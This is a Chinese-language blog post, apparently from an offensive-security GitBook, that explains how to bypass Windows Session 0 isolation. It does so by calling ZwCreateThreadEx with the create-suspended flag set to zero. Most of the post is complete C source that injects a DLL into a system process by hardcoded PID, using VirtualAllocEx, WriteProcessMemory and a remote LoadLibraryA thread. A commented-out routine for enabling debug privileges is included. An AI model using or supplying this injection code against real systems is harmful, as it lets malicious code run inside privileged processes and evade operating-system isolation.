idiotc4t's blog
搜索文档…
GitBook 提供支持
Bypass Session 0 Injection

简介

在使用传统的进程注入技术的过程中,可以向普通用户用户进程注入shellcode或dll,那么如果我们想更进一步注入到系统进程内,通常会失败,这是由于session 0隔离的缘故,接下来本文会介绍如何突破session 0隔离进行对系统进程的注入。

ZwCreateThreadEx函数

通过调用CreateRemoteThread创建远程线程在NT内核6.0以前是没有什么问题,但在6.0以后引入了session隔离机制,在创建一个线程时先挂起,然后判断是否运行在所在会话层再决定是否恢复运行。
ZwCreateThreadEx函数比CreateRemoteThread函数更接近内核,CreateRemoteThread最终也是调用ZwCreateThreadEx函数来创建线程的,通过前人的研究发现,通过对CreateRemoteThread逆向研究发现,在内部调用ZwCreateThreadEx会把第七个参数创建标识设置为1,这样会使创建的线程挂起,这也是注入失败的原因。
所以如果想要创建的线程成功执行我们需要将第七个参数指定为0,这样我们就能在创建线程后让他执行。
ZwCreateThreadEx函数原型不同位数莫得区别。

代码实现

该注入技术与经典WriteProcessMemory,CreateRemoteThread注入技术非常相似,只是把创建进程的函数从CreateRemoteThread换成了ZwCreateThreadEx。
1
#include <Windows.h>
2
#include <stdio.h>
3
4
#ifdef _WIN64
5
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
6
PHANDLE ThreadHandle,
7
ACCESS_MASK DesiredAccess,
8
LPVOID ObjectAttributes,
9
HANDLE ProcessHandle,
10
LPTHREAD_START_ROUTINE lpStartAddress,
11
LPVOID lpParameter,
12
ULONG CreateThreadFlags,
13
SIZE_T ZeroBits,
14
SIZE_T StackSize,
15
SIZE_T MaximumStackSize,
16
LPVOID pUnkown);
17
#else
18
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
19
PHANDLE ThreadHandle,
20
ACCESS_MASK DesiredAccess,
21
LPVOID ObjectAttributes,
22
HANDLE ProcessHandle,
23
LPTHREAD_START_ROUTINE lpStartAddress,
24
LPVOID lpParameter,
25
BOOL CreateSuspended,
26
DWORD dwStackSize,
27
DWORD dw1,
28
DWORD dw2,
29
LPVOID pUnkown);
30
#endif
31
32
typedef DWORD(WINAPI* typedef_LoadLibraryA)(char* path);
33
/*
34
BOOL EnbalePrivileges(HANDLE hProcess, char* pszPrivilegesName)
35
{
36
HANDLE hToken = NULL;
37
LUID luidValue = { 0 };
38
TOKEN_PRIVILEGES tokenPrivileges = { 0 };
39
BOOL bRet = FALSE;
40
41
bRet = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
42
43
bRet = LookupPrivilegeValue(NULL, pszPrivilegesName, &luidValue);
44
45
tokenPrivileges.PrivilegeCount = 1;
46
tokenPrivileges.Privileges[0].Luid = luidValue;
47
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
48
bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, NULL, NULL);
49
50
51
return TRUE;
52
}*/
53
54
int main(int argc, char* argv[]) {
55
//EnbalePrivileges(GetCurrentProcess(), SE_DEBUG_NAME);
56
57
char DllPath[] = "C:\\Users\\Black Sheep\\source\\repos\\sesion0\\x64\\Debug\\TestDll.dll";
58
59
HANDLE hRemoteThread;
60
61
HANDLE hNtModule = GetModuleHandleA("ntdll.dll");
62
63
HANDLE hKeModule = GetModuleHandleA("Kernel32.dll");
64
65
typedef_ZwCreateThreadEx ZwCreateThreadEx = GetProcAddress(hNtModule, "ZwCreateThreadEx");
66
67
typedef_LoadLibraryA myLoadLibraryA = GetProcAddress(hKeModule, "LoadLibraryA");
68
69
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 1516);
70
71
LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath)+1, MEM_COMMIT, PAGE_READWRITE);
72
73
WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), 0);
74
75
ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL);
76
77
CloseHandle(hRemoteThread);
78
CloseHandle(hProcess);
79
FreeLibrary(hKeModule);
80
FreeLibrary(hNtModule);
81
return 0;
82
83
}
Copied!

LINKS

《windows黑客编程》
What is Windows Session 0 Isolation and Interactive Services Detection?
Help Center
最近更新 1yr ago